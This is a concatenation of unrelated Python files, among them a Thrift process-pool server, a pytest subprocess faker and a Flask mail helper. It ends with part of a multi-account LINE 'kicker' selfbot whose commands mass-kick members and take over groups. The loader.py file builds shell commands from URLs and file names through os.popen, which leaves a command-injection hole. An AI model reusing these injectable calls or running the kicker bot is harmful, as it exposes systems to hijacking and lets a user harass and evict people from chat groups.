self, group=None, target=None, name=None, args=(), kwargs={}, *, daemon=None
):
# def __init__(self, group=None, target=None, name=None, args=(), kwargs={}):
self.args = args
self.kwargs = kwargs
self.name = name
self.slice = 0
self.last = aio.rtclock()
if target:
if hasattr(target, "run"):
if name is None:
self.name = name or target.__class__.__name__
self.run = target.run
else:
self.run = target
if name is None:
try:
self.name = "%s-%s" % (self.run.__name__, id(self))
except:
pass
else:
target = self
if self.name is None:
self.name = "%s-%s" % (self.__class__.__name__, id(self))
self.status = None
async def wrap(self):
for idle in self.run(*self.args, **self.kwargs):
await aio.sleep(0)
async def runner(self, coro):
self.status = True
try:
# TODO: pass thread local context here
async with aio.ctx(self.slice).call(coro):
self.status = False
except Exception as e:
self.status = repr(e)
sys.print_exception(e, sys.stderr)
if __UPY__:
def __iter__(self):
if self.status is True:
rtc = aio.rtclock()
self.delta = (rtc - self.last) - self.slice
if self.delta < 0:
self.delta = 0
yield from aio.sleep_ms(self.slice - int(self.delta / 2))
self.last = rtc
__await__ = __iter__
else:
def __await__(self):
if self.status is True:
rtc = aio.rtclock()
self.delta = (rtc - self.last) - self.slice
if self.delta < 0:
self.delta = 0
# no sleep_ms on cpy
yield from aio.sleep_ms(
float(self.slice - int(self.delta / 2)) / 1_000
).__await__()
# return aio.sleep( float(self.slice - int(self.delta / 2)) / 1_000 )
self.last = rtc
def rt(self, slice):
self.slice = int(float(slice) * 1_000)
return self
def start(self):
aio.pstab.setdefault(self.name, [])
if self.run:
if not inspect.iscoroutinefunction(self.run):
self.status = True
aio.create_task(self.wrap())
else:
coro = self.run(*self.args, **self.kwargs)
pdb("168:", self.name, "starting", coro)
aio.create_task(self.runner(coro))
aio.pstab[self.name].append(self)
return self
def join(self):
embed.enable_irq()
while self.is_alive():
aio_suspend()
embed.disable_irq()
def __bool__(self):
return self.is_alive() and not aio.exit
def is_alive(self):
return self.status is True
def service(srv, *argv, **kw):
embed.log(f"starting green thread : {srv}")
thr = aio.Thread(group=None, target=srv, args=argv, kwargs=kw).start()
srv.__await__ = thr.__await__
return aio.pstab.setdefault(srv, thr)
aio.task = service
def proc(srv):
return aio.pstab.get(srv)
class Runnable:
def __await__(self):
yield from aio.pstab.get(self).__await__()
# replace with green threading
import sys
sys.modules["threading"] = sys.modules["aio.gthread"]
|
TProcessPoolServer.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import logging
logger = logging.getLogger(__name__)
from multiprocessing import Process, Value, Condition, reduction
from TServer import TServer
from thrift.transport.TTransport import TTransportException
class TProcessPoolServer(TServer):
"""Server with a fixed size pool of worker subprocesses to service requests
Note that if you need shared state between the handlers - it's up to you!
Written by Dvir Volk, doat.com
"""
def __init__(self, *args):
TServer.__init__(self, *args)
self.numWorkers = 10
self.workers = []
self.isRunning = Value('b', False)
self.stopCondition = Condition()
self.postForkCallback = None
def setPostForkCallback(self, callback):
if not callable(callback):
raise TypeError("This is not a callback!")
self.postForkCallback = callback
def setNumWorkers(self, num):
"""Set the number of worker threads that should be created"""
self.numWorkers = num
def workerProcess(self):
"""Loop getting clients from the shared queue and process them"""
if self.postForkCallback:
self.postForkCallback()
while self.isRunning.value:
try:
client = self.serverTransport.accept()
if not client:
continue
self.serveClient(client)
except (KeyboardInterrupt, SystemExit):
return 0
except Exception, x:
logger.exception(x)
def serveClient(self, client):
"""Process input/output from a client for as long as possible"""
itrans = self.inputTransportFactory.getTransport(client)
otrans = self.outputTransportFactory.getTransport(client)
iprot = self.inputProtocolFactory.getProtocol(itrans)
oprot = self.outputProtocolFactory.getProtocol(otrans)
try:
while True:
self.processor.process(iprot, oprot)
except TTransportException, tx:
pass
except Exception, x:
logger.exception(x)
itrans.close()
otrans.close()
def serve(self):
"""Start workers and put into queue"""
# this is a shared state that can tell the workers to exit when False
self.isRunning.value = True
# first bind and listen to the port
self.serverTransport.listen()
# fork the children
for i in range(self.numWorkers):
try:
w = Process(target=self.workerProcess)
w.daemon = True
w.start()
self.workers.append(w)
except Exception, x:
logger.exception(x)
# wait until the condition is set by stop()
while True:
self.stopCondition.acquire()
try:
self.stopCondition.wait()
break
except (SystemExit, KeyboardInterrupt):
break
except Exception, x:
logger.exception(x)
self.isRunning.value = False
def stop(self):
self.isRunning.value = False
self.stopCondition.acquire()
self.stopCondition.notify()
self.stopCondition.release()
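# Minimal usage sketch (Python 2, as above). MyService/MyHandler and the
# port are placeholders for a generated Thrift service and its handler:
#
# from thrift.transport import TSocket, TTransport
# from thrift.protocol import TBinaryProtocol
#
# processor = MyService.Processor(MyHandler())
# transport = TSocket.TServerSocket(port=9090)
# server = TProcessPoolServer(processor, transport,
#                             TTransport.TBufferedTransportFactory(),
#                             TBinaryProtocol.TBinaryProtocolFactory())
# server.setNumWorkers(4)
# server.serve()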
|
loader.py
|
import logging
import os
import sys
import threading
log = logging.getLogger( __name__ )
def download_prepare( directory ):
""""""
log.info( 'Creating dumps directory' )
os.popen( 'mkdir -p %s' % directory )
def dump_download( url, directory ):
""""""
# extract filename from url
filename = url[url.rfind( '/' )+1:]
path = '/'.join( [directory, filename] )
if os.path.isfile( path ):
log.info( 'File already downloaded. see %s', path )
return path
# download anew
log.info( 'Downloading %s ..', filename )
os.popen( 'wget --quiet %s ' % url )
log.info( 'Moving to dumps-directory ..' )
os.popen( 'mv %s %s' % ( filename, directory ) )
return path
def dump_extract( file ):
""""""
if not file:
return None
if not os.path.isfile( file ):
log.error( 'File not found, %s', file )
return None
xfile = file[0:file.rfind( '.bz2' )]
if os.path.isfile(xfile + '.csv'):
log.info( 'File already converted. see %s', xfile + '.csv' )
return xfile
log.info( 'Extracting %s', file )
os.popen( './to_one-liner.sh %s %s %s' % ( os.path.dirname( file ), os.path.basename( file ), '.bz2' ) )
return xfile
def dump_convert( file ):
""""""
if not file:
return None
if not os.path.isfile( file ):
log.error( 'File to extract not found, %s', file )
return None
log.info( 'Converting %s', file )
os.popen( './to_csv.sh %s %s %s' % ( file, 'true', '.ttl' ) )
return file
def dump_append( file, output_file ):
""""""
file = file + '.csv'
if not file:
return None
if not os.path.isfile( file ):
log.error( 'File to append not found, %s', file )
return None
os.popen( 'cat %s >> %s' % ( file, output_file ) )
def dump_cleanup( file ):
""""""
if not file:
return None
os.remove( file )
def handle_url( sem, url, directory ):
""""""
with sem:
log.info( 'Handling %s', url )
# returns downloaded file
file = dump_download( url, directory )
# returns extracted file
file = dump_extract( file )
# returns extracted file
file = dump_convert( file )
# rm xf
dump_cleanup( file )
# append
# dump_append( file, directory + '/dbpedia-all-en.ttl.csv' )
log.info( 'Done' )
def start_crawling( urls, directory, no_of_threads=1 ):
""""""
download_prepare( directory )
threads = []
sem = threading.Semaphore( no_of_threads )
for url in urls:
filename = url[url.rfind( '/' )+1:]
# create a thread for each url. work load is limited by the semaphore
t = threading.Thread( target = handle_url, name = filename, args = ( sem, url, directory ) )
t.start()
threads.append( t )
# wait for all threads to finish
for t in threads:
t.join()
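def _example_crawl():
    """Minimal usage sketch; the URL is a placeholder for any .bz2 dump."""
    urls = ['http://example.org/dumps/labels_en.ttl.bz2']
    start_crawling(urls, 'dumps', no_of_threads=2)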
|
email.py
|
from flask_mail import Message
from app import mail
from flask import render_template
from app import app
from threading import Thread
from flask_babel import _
def send_async_email(app, msg):
with app.app_context():
mail.send(msg)
def send_mail(subject, sender, recipients, text_body, html_body):
msg = Message(subject, sender=sender, recipients=recipients)
msg.body = text_body
msg.html = html_body
Thread(target=send_async_email, args=(app, msg)).start()
def send_password_reset_email(user):
token = user.get_reset_password_token()
send_mail(_('[Microblog] Reset Your Password'),
sender=app.config['ADMINS'][0],
recipients=[user.email],
text_body=render_template('email/reset_password.txt',
user=user, token=token),
html_body=render_template('email/reset_password.html',
user=user, token=token))
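def _example_send():
    """Minimal usage sketch: send_mail() returns immediately, delivery
    happens on a background thread. The recipient is a placeholder."""
    send_mail('[Microblog] Hello', sender=app.config['ADMINS'][0],
              recipients=['user@example.com'],
              text_body='plain-text body', html_body='<p>html body</p>')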
|
core.py
|
# -*- coding: utf-8 -*-
import io
import os
import subprocess
import sys
import time
from collections import defaultdict
from collections import deque
from copy import deepcopy
from typing import Any as AnyType
from typing import Callable
from typing import DefaultDict
from typing import Deque
from typing import Dict
from typing import List
from typing import Optional
from typing import Sequence
from typing import Tuple
from typing import Type
from typing import Union
from .utils import Any
from .utils import Command
from .utils import Thread
OPTIONAL_TEXT = Union[str, bytes, None]
OPTIONAL_TEXT_OR_ITERABLE = Union[
str, bytes, None, Sequence[Union[str, bytes]],
]
BUFFER = Union[None, io.BytesIO, io.StringIO]
ARGUMENT = Union[str, Any]
COMMAND = Union[Sequence[ARGUMENT], str, Command]
class PluginInternalError(Exception):
"""Raised in case of an internal error in the plugin"""
class FakePopen:
"""Base class that fakes the real subprocess.Popen()"""
stdout: BUFFER = None
stderr: BUFFER = None
returncode: Optional[int] = None
text_mode: bool = False
pid: int = 0
def __init__(
self,
command: Union[
Union[bytes, str],
Sequence[Union[str, bytes, "os.PathLike[str]", "os.PathLike[bytes]"]],
],
stdout: OPTIONAL_TEXT_OR_ITERABLE = None,
stderr: OPTIONAL_TEXT_OR_ITERABLE = None,
returncode: int = 0,
wait: Optional[float] = None,
callback: Optional[Callable] = None,
callback_kwargs: Optional[Dict[str, AnyType]] = None,
stdin_callable: Optional[Callable] = None,
**_: Dict[str, AnyType]
) -> None:
self.args = command
self.__stdout: OPTIONAL_TEXT_OR_ITERABLE = stdout
self.__stderr: OPTIONAL_TEXT_OR_ITERABLE = stderr
self.__returncode: Optional[int] = returncode
self.__wait: Optional[float] = wait
self.__thread: Optional[Thread] = None
self.__callback: Optional[Callable] = callback
self.__callback_kwargs: Optional[Dict[str, AnyType]] = callback_kwargs
self.__stdin_callable: Optional[Callable] = stdin_callable
def __enter__(self) -> "FakePopen":
return self
def __exit__(self, *args: List, **kwargs: Dict) -> None:
if self.__thread and self.__thread.exception:
raise self.__thread.exception
def communicate(
self, input: OPTIONAL_TEXT = None, timeout: Optional[float] = None
) -> Tuple[AnyType, AnyType]:
if input and self.__stdin_callable:
callable_output = self.__stdin_callable(input)
if isinstance(callable_output, dict):
self.stdout = self._extend_stream_from_dict(
callable_output, "stdout", self.stdout
)
self.stderr = self._extend_stream_from_dict(
callable_output, "stderr", self.stderr
)
return (
self.stdout.getvalue() if self.stdout else None,
self.stderr.getvalue() if self.stderr else None,
)
def _extend_stream_from_dict(
self, dictionary: Dict[str, AnyType], key: str, stream: BUFFER
) -> BUFFER:
data = dictionary.get(key)
if data:
return self._prepare_buffer(input=data, io_base=stream)
return None
def poll(self) -> Optional[int]:
return self.returncode
def wait(self, timeout: Optional[float] = None) -> int:
if timeout and self.__wait and timeout < self.__wait:
self.__wait -= timeout
raise subprocess.TimeoutExpired(self.args, timeout)
if self.__thread is not None:
self.__thread.join()
if self.returncode is None and self.__returncode is not None:
self.returncode = self.__returncode
if self.__thread.exception:
raise self.__thread.exception
if self.returncode is None:
raise PluginInternalError
return self.returncode
def configure(self, **kwargs: Optional[Dict]) -> None:
"""Setup the FakePopen instance based on a real Popen arguments."""
self.__universal_newlines = kwargs.get("universal_newlines", None)
text = kwargs.get("text", None)
encoding = kwargs.get("encoding", None)
errors = kwargs.get("errors", None)
if text and sys.version_info < (3, 7):
raise TypeError("__init__() got an unexpected keyword argument 'text'")
self.text_mode = bool(text or self.__universal_newlines or encoding or errors)
# validation taken from the real subprocess
if (
text is not None
and self.__universal_newlines is not None
and bool(self.__universal_newlines) != bool(text)
):
raise subprocess.SubprocessError(
"Cannot disambiguate when both text "
"and universal_newlines are supplied but "
"different. Pass one or the other."
)
if kwargs.get("stdout") == subprocess.PIPE:
self.stdout = self._prepare_buffer(self.__stdout)
stderr = kwargs.get("stderr")
if stderr == subprocess.STDOUT and self.__stderr:
self.stdout = self._prepare_buffer(self.__stderr, self.stdout)
elif stderr == subprocess.PIPE:
self.stderr = self._prepare_buffer(self.__stderr)
def _prepare_buffer(
self, input: OPTIONAL_TEXT_OR_ITERABLE, io_base: BUFFER = None,
) -> Union[io.BytesIO, io.StringIO]:
linesep = self._convert(os.linesep)
if isinstance(input, (list, tuple)):
# need to disable mypy, as input and linesep are unions,
# mypy thinks that the types might be incompatible, but
# the _convert() function handles that
input = linesep.join(map(self._convert, input)) # type: ignore
# Add trailing newline if data is present.
if input:
# same reason to disable mypy as above
input += linesep # type: ignore
if isinstance(input, str) and not self.text_mode:
input = input.encode()
if isinstance(input, bytes) and self.text_mode:
input = input.decode()
if input and self.__universal_newlines and isinstance(input, str):
input = input.replace("\r\n", "\n")
if io_base is not None:
# same reason for disabling mypy as in `input = linesep.join...`:
# both are union so could be incompatible if not _convert()
input = io_base.getvalue() + (input) # type: ignore
io_base = io.StringIO() if self.text_mode else io.BytesIO()
if input is None:
return io_base
# similar as above - mypy has to be disabled because unions
io_base.write(input) # type: ignore
return io_base
def _convert(self, input: Union[str, bytes]) -> Union[str, bytes]:
if isinstance(input, bytes) and self.text_mode:
return input.decode()
if isinstance(input, str) and not self.text_mode:
return input.encode()
return input
def _wait(self, wait_period: float) -> None:
time.sleep(wait_period)
if self.returncode is None:
self._finish_process()
def run_thread(self) -> None:
"""Run the user-defined callback or wait in a thread."""
if self.__wait is None and self.__callback is None:
self._finish_process()
else:
if self.__callback:
self.__thread = Thread(
target=self.__callback,
args=(self,),
kwargs=self.__callback_kwargs or {},
)
else:
self.__thread = Thread(target=self._wait, args=(self.__wait,))
self.__thread.start()
def _finish_process(self) -> None:
self.returncode = self.__returncode
if self.stdout:
self.stdout.seek(0)
if self.stderr:
self.stderr.seek(0)
class ProcessNotRegisteredError(Exception):
"""
Raised when the attempted command wasn't registered before.
Use `fake_process.allow_unregistered(True)` if you want to use real subprocess.
"""
class ProcessDispatcher:
"""Main class for handling processes."""
process_list: List["FakeProcess"] = []
built_in_popen: Optional[Callable] = None
_allow_unregistered: bool = False
_cache: Dict["FakeProcess", Dict["FakeProcess", AnyType]] = dict()
_keep_last_process: bool = False
_pid: int = 0
@classmethod
def register(cls, process: "FakeProcess") -> None:
if not cls.process_list:
cls.built_in_popen = subprocess.Popen
subprocess.Popen = cls.dispatch # type: ignore
cls._cache[process] = {
proc: deepcopy(proc.definitions) for proc in cls.process_list
}
cls.process_list.append(process)
@classmethod
def deregister(cls, process: "FakeProcess") -> None:
cls.process_list.remove(process)
cache = cls._cache.pop(process)
for proc, processes in cache.items():
proc.definitions = processes
if not cls.process_list:
subprocess.Popen = cls.built_in_popen # type: ignore
cls.built_in_popen = None
@classmethod
def dispatch(cls, command: COMMAND, **kwargs: Optional[Dict]) -> FakePopen:
"""This method will be used instead of the subprocess.Popen()"""
command_instance, processes, process_instance = cls._get_process(command)
if process_instance:
process_instance.calls.append(command)
if not processes:
if not cls._allow_unregistered:
raise ProcessNotRegisteredError(
"The process '%s' was not registered."
% (
command
if isinstance(command, str)
else " ".join(str(item) for item in command),
)
)
else:
if cls.built_in_popen is None:
raise PluginInternalError
return cls.built_in_popen(command, **kwargs) # type: ignore
process = processes.popleft()
if not processes and process_instance is not None:
if cls._keep_last_process:
processes.append(process)
elif command_instance:
del process_instance.definitions[command_instance]
cls._pid += 1
if isinstance(process, bool):
# real process will be called
return cls.built_in_popen(command, **kwargs) # type: ignore
# Update the command with the actual command specified by the caller.
# This will ensure that Command objects do not end up unexpectedly in
# caller's objects (e.g. proc.args, CalledProcessError.cmd). Take care
# to preserve the dict that may still be referenced when using
# keep_last_process.
fake_popen_kwargs = process.copy()
fake_popen_kwargs["command"] = command
result = FakePopen(**fake_popen_kwargs)
result.pid = cls._pid
result.configure(**kwargs)
result.run_thread()
return result
@classmethod
def _get_process(
cls, command: COMMAND
) -> Tuple[
Optional[Command], Optional[Deque[Union[dict, bool]]], Optional["FakeProcess"]
]:
for proc in reversed(cls.process_list):
command_instance, processes = next(
(
(key, value)
for key, value in proc.definitions.items()
if key == command
),
(None, None),
)
process_instance = proc
if processes and isinstance(processes, deque):
return command_instance, processes, process_instance
return None, None, None
@classmethod
def allow_unregistered(cls, allow: bool) -> None:
cls._allow_unregistered = allow
@classmethod
def keep_last_process(cls, keep: bool) -> None:
cls._keep_last_process = keep
class IncorrectProcessDefinition(Exception):
"""Raised when the register_subprocess() has been called with wrong arguments"""
class FakeProcess:
"""Main class responsible for process operations"""
any: Type[Any] = Any
def __init__(self) -> None:
self.definitions: DefaultDict[Command, Deque[Union[Dict, bool]]] = defaultdict(
deque
)
self.calls: Deque[COMMAND] = deque()
def register_subprocess(
self,
command: COMMAND,
stdout: OPTIONAL_TEXT_OR_ITERABLE = None,
stderr: OPTIONAL_TEXT_OR_ITERABLE = None,
returncode: int = 0,
wait: Optional[float] = None,
callback: Optional[Callable] = None,
callback_kwargs: Optional[Dict[str, AnyType]] = None,
occurrences: int = 1,
stdin_callable: Optional[Callable] = None,
) -> None:
"""
Main method for registering the subprocess instances.
Args:
command: register the command that will be faked
stdout: value of the standard output
stderr: value of the error output
returncode: return code of the faked process
wait: artificially wait for the process to finish
callback: function that will be executed instead of the process
callback_kwargs: keyword arguments that will be passed into callback
occurrences: allow multiple usages of the same command
stdin_callable: function that will interact with stdin
"""
if wait is not None and callback is not None:
raise IncorrectProcessDefinition(
"The 'callback' and 'wait' arguments cannot be used "
"together. Add sleep() to your callback instead."
)
if not isinstance(command, Command):
command = Command(command)
self.definitions[command].extend(
[
{
"command": command,
"stdout": stdout,
"stderr": stderr,
"returncode": returncode,
"wait": wait,
"callback": callback,
"callback_kwargs": callback_kwargs,
"stdin_callable": stdin_callable,
}
]
* occurrences
)
def pass_command(self, command: COMMAND, occurrences: int = 1,) -> None:
"""
Allow to use a real subprocess together with faked ones.
Args:
command: allow to execute the supplied command
occurrences: allow multiple usages of the same command
"""
if not isinstance(command, Command):
command = Command(command)
self.definitions[command].extend([True] * occurrences)
def __enter__(self) -> "FakeProcess":
ProcessDispatcher.register(self)
return self
def __exit__(self, *args: List, **kwargs: Dict) -> None:
ProcessDispatcher.deregister(self)
@classmethod
def allow_unregistered(cls, allow: bool) -> None:
"""
Allow / block unregistered processes execution. When allowed, the real
subprocesses will be called. Blocking will raise the exception.
Args:
allow: decide whether the unregistered process shall be allowed
"""
ProcessDispatcher.allow_unregistered(allow)
def call_count(self, command: COMMAND) -> int:
"""
Count how many times a certain command was called. Can be used
together with `fake_process.any()`.
Args:
command: lookup command
Returns:
number of times a command was called
"""
if not isinstance(command, Command):
    command = Command(command)
return len(tuple(filter(lambda elem: elem == command, self.calls)))
@classmethod
def keep_last_process(cls, keep: bool) -> None:
"""
Keep last process definition from being removed. That can allow / block
multiple execution of the same command.
Args:
keep: decide whether last process shall be kept
"""
ProcessDispatcher.keep_last_process(keep)
@classmethod
def context(cls) -> "FakeProcess":
"""Return a new FakeProcess instance to use it as a context manager."""
return cls()
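def _example_fake_process():
    """Minimal usage sketch: register a fake command, run it through the
    patched subprocess.Popen, and inspect the recorded call."""
    with FakeProcess() as fake:
        fake.register_subprocess(
            ["git", "rev-parse", "HEAD"], stdout="abc123", returncode=0
        )
        proc = subprocess.Popen(["git", "rev-parse", "HEAD"], stdout=subprocess.PIPE)
        out, _ = proc.communicate()
        assert out == b"abc123" + os.linesep.encode()  # trailing newline is appended
        assert fake.call_count(["git", "rev-parse", "HEAD"]) == 1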
|
script.py
|
import humanaction_client
import argparse
from threading import Thread
import time
import cv2
import numpy as np
import imutils
from imutils.video import FileVideoStream
from imutils.video import FPS
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video", required=True,
help="path to input video file")
args = vars(ap.parse_args())
def imshoww():
print("[INFO] starting video file thread...")
fvs = FileVideoStream(args["video"]).start()
time.sleep(1.0)
# start the FPS timer
fps = FPS().start()
# loop over frames from the video file stream
while fvs.more():
# grab the frame from the threaded video file stream, resize
# it, and convert it to grayscale (while still retaining 3
# channels)
frame = fvs.read()
frame = imutils.resize(frame, width=450)
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
frame = np.dstack([frame, frame, frame])
# display the size of the queue on the frame
cv2.putText(frame, "Queue Size: {}".format(fvs.Q.qsize()),
(10, 30), cv2.FONT_HERSHEY_SIMPLEX, 0.6, (0, 255, 0), 2)
# show the frame and update the FPS counter
cv2.imshow("Frame", frame)
time.sleep(0.035)
cv2.waitKey(1)
fps.update()
# stop the timer and display FPS information
fps.stop()
print("[INFO] elasped time: {:.2f}".format(fps.elapsed()))
print("[INFO] approx. FPS: {:.2f}".format(fps.fps()))
# do a bit of cleanup
cv2.destroyAllWindows()
fvs.stop()
# Pass the callable and its argument separately; calling run() here would
# block and hand Thread its return value instead of a target.
thread = Thread(target = humanaction_client.run, args = (args["video"],))
thread.daemon = True
thread.start()
Thread(target = imshoww).start()
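# Note: the humanaction_client thread is a daemon, so process lifetime is
# governed by the non-daemon display thread above; an explicit join() on a
# kept reference would make the shutdown order easier to follow.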
|
10sb.py
|
# -*- coding: utf-8 -*-
import LINETCR
from LINETCR.lib.curve.ttypes import *
from datetime import datetime
import time,random,sys,json,codecs,threading,glob
cl = LINETCR.LINE()
cl.login(qr=True)
cl.loginResult()
ki = LINETCR.LINE()
ki.login(qr=True)
ki.loginResult()
kk = LINETCR.LINE()
kk.login(qr=True)
kk.loginResult()
kc = LINETCR.LINE()
kc.login(qr=True)
kc.loginResult()
kb = LINETCR.LINE()
kb.login(qr=True)
kb.loginResult()
kd = LINETCR.LINE()
kd.login(qr=True)
kd.loginResult()
ke = LINETCR.LINE()
ke.login(qr=True)
ke.loginResult()
kh = LINETCR.LINE()
kh.login(qr=True)
kh.loginResult()
kj = LINETCR.LINE()
kj.login(qr=True)
kj.loginResult()
kf = LINETCR.LINE()
kf.login(qr=True)
kf.loginResult()
kg = LINETCR.LINE()
kg.login(qr=True)
kg.loginResult()
print u"login success"
reload(sys)
sys.setdefaultencoding('utf-8')
helpMessage =""" ➰└ Commands Bots ┐➰
=====[ ™Amii™вσт ]=====
🔐 Me
🔐 TL: └ Text ┐
🔐 Mid
🔐 Up
🔐 Creator
🔐 Cancel! ~ Cancel pending invite 1 by 1
🔐 Copy└ @ ┐
🔐 Speed, Sp
🔐 Your name
🔐 List group
🔐 Qr on/off
🔐 Namelock on/off
🔐 Clock on/off
🔐 Change clock
🔐 Cn:└ Your Name ┐
🔐 Cancelall └ Reject spam invite ┐
🔐 Cancelall1└ K1 Reject spam invite ┐
🔐 Message set:└Text┐
🔐 Comment set: └Text┐
🔐 My message
🔐 My comment
🔐 Add confirm
🔐 Ginfo
🔐 Mid└ @ ┐ Tag
🔐 Banlist
🔐 Cek ban
🔐 Ban ~ Share contact
🔐 Unban ~ Share contact
🔐 Ban └ @ ┐ Tag
🔐 Unban └ @ ┐ Tag
🔐 Seeyou ~ KICK BLACKLIST USER
🔐 Gurl └ View Link Groups ┐
🔐 Say └ Text ┐
🔐 Cancel
🔐 Gn: └ Name ┐
🔐 Maaf!└ @ ┐ Tag
🔐 Nk └ @ ┐ Tag
🔐 BL└ @ ┐ Tag
🔐 Sorry!! └ @ ┐ Tag
🔐 /rusuh └ @ ┐ Tag
🔐 Anjay! ~ Play this group
🔐 Mentions
🔐 Invite └ Mid ┐
🔐 Respon
🔐 Set ~ View your setting
🔐 Gift
🔐 Gift1
🔐 Gift2
🔐 Gift3
🔐 Masuk beb ~ All Kicker join
🔐 Husss ~ All Kicker leave
🔐 Kuy1 /2/3~ All kicker join one by one
➰└ Commands Set ┐➰
🔐 Auto Like : on/off
🔐 Contact : on/off
🔐 Auto join : on/off
🔐 Auto Cancel : 1 on/off
🔐 Auto Like : on/off
🔐 Auto leave : on/off
🔐 Share : on/off
🔐 Auto add : on/off
🔐 Comment : on/off
🔐 Protect : on/off
🔐 Protect qr : on/off
🔐 Welcome : on/off
===[ ™Amii™вσт ]===
"""
KAC=[cl,ki,kk,kc,kb,kd,ke,kf,kg,kh,kj]
mid = cl.getProfile().mid
Amid = ki.getProfile().mid
Bmid = kk.getProfile().mid
Cmid = kc.getProfile().mid
Dmid = kb.getProfile().mid
Emid = kd.getProfile().mid
Fmid = ke.getProfile().mid
Gmid = kg.getProfile().mid
Hmid = kh.getProfile().mid
Jmid = kj.getProfile().mid
Imid = kf.getProfile().mid
Bots=[mid,Amid,Bmid,Cmid,Dmid,Emid,Fmid,Gmid,Hmid,Jmid,Imid]
admin=["ub5ae780d74acdd2c05b750ef7fb4ae31","u78e5efff85bf97393cc2c4b8ecf93d25","u2355fb85d6b43785e0b7770f956d0347"]
wait = {
'contact':False,
'autoJoin':True,
'autoCancel':{"on":True,"members":1},
'leaveRoom':True,
'timeline':False,
'autoAdd':False,
'message':"Thanks for add Created by ┅═ই❂͡★Amii™┅═ই❂͡\n\n>> https://line.me/ti/p/~amiiqila_",
"lang":"JP",
"comment":"🔹Auto like by ☞ ┅═ই❂͡★Amii™┅═ই❂͡ \n\n>> https://line.me/ti/p/~amiiqila_",
"likeOn":True,
"commentOn":True,
"commentBlack":{},
"wblack":False,
"dblack":False,
"clock":False,
"cName":"┅═ই❂͡★Amii™┅═ই❂͡ ",
"blacklist":{},
"wblacklist":False,
"dblacklist":False,
"protectionOn":True,
"Backup":True,
"qr":True,
"pname":{},
"pro_name":{},
"welcome":True,
}
wait2 = {
'readPoint':{},
'readMember':{},
'setTime':{},
'ROM':{}
}
setTime = wait2['setTime']
blacklistFile = 'blacklist.txt'
pendinglistFile = 'pendinglist.txt'
contact = cl.getProfile()
backup = cl.getProfile()
backup.displayName = contact.displayName
backup.statusMessage = contact.statusMessage
backup.pictureStatus = contact.pictureStatus
messageReq = {}
def sendMessage(to, text, contentMetadata={}, contentType=0):
    mes = Message()
    mes.to, mes.from_ = to, mid
    mes.text = text
    mes.contentType, mes.contentMetadata = contentType, contentMetadata
    if to not in messageReq:
        messageReq[to] = -1
    messageReq[to] += 1
    cl.sendMessage(mes)
def NOTIFIED_READ_MESSAGE(op):
#print op
try:
if op.param1 in wait2['readPoint']:
Name = cl.getContact(op.param2).displayName
if Name in wait2['readMember'][op.param1]:
pass
else:
wait2['readMember'][op.param1] += "\n・" + Name
wait2['ROM'][op.param1][op.param2] = "・" + Name
else:
pass
except:
pass
def bot(op):
try:
if op.type == 0:
return
if op.type == 5:
if wait["autoAdd"] == True:
cl.findAndAddContactsByMid(op.param1)
if (wait["message"] in [""," ","\n",None]):
pass
else:
cl.sendText(op.param1,str(wait["message"]))
if op.type == 13:
if op.param3 in mid:
if op.param2 in Amid:
G = cl.getGroup(op.param1)
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
else:
G = ki.getGroup(op.param1)
ki.kickoutFromGroup(op.param1,[op.param2])
G.preventJoinByTicket = False
ki.updateGroup(G)
Ticket = ki.reissueGroupTicket(op.param1)
cl.acceptGroupInvitationByTicket(op.param1,Ticket)
G.preventJoinByTicket = True
ki.updateGroup(G)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Amid:
if op.param2 in Bmid:
X = ki.getGroup(op.param1)
X.preventJoinByTicket = False
kk.updateGroup(X)
Ti = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kk.updateGroup(X)
else:
X = kk.getGroup(op.param1)
kk.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kk.updateGroup(X)
Ticket = kk.reissueGroupTicket(op.param1)
ki.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Bmid:
if op.param2 in Cmid:
X = kk.getGroup(op.param1)
X.preventJoinByTicket = False
kc.updateGroup(X)
Ti = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kc.updateGroup(X)
else:
X = kc.getGroup(op.param1)
kc.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kc.updateGroup(X)
Ticket = kc.reissueGroupTicket(op.param1)
kk.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
ki.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Cmid:
if op.param2 in Dmid:
X = kc.getGroup(op.param1)
X.preventJoinByTicket = False
kb.updateGroup(X)
Ti = kb.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kb.updateGroup(X)
else:
X = kb.getGroup(op.param1)
kb.kickoutFromGroup(op.param1,[op.param2])
X.preventJoinByTicket = False
kb.updateGroup(X)
Ticket = kb.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ticket)
X.preventJoinByTicket = True
cl.updateGroup(X)
wait["blacklist"][op.param2] = False
if op.type == 13:
if op.param3 in Dmid:
if op.param2 in Emid:
X = kb.getGroup(op.param1)
X.preventJoinByTicket = False
kd.updateGroup(X)
Ti = kd.reissueGroupTicket(op.param1)
kc.acceptGroupInvitationByTicket(op.param1,Ti)
X.preventJoinByTicket = True
kd.updateGroup(X)
else:
X = kd.getGroup(op.param1)
kd.kickoutFromGroup(op.param1,[op.param2])
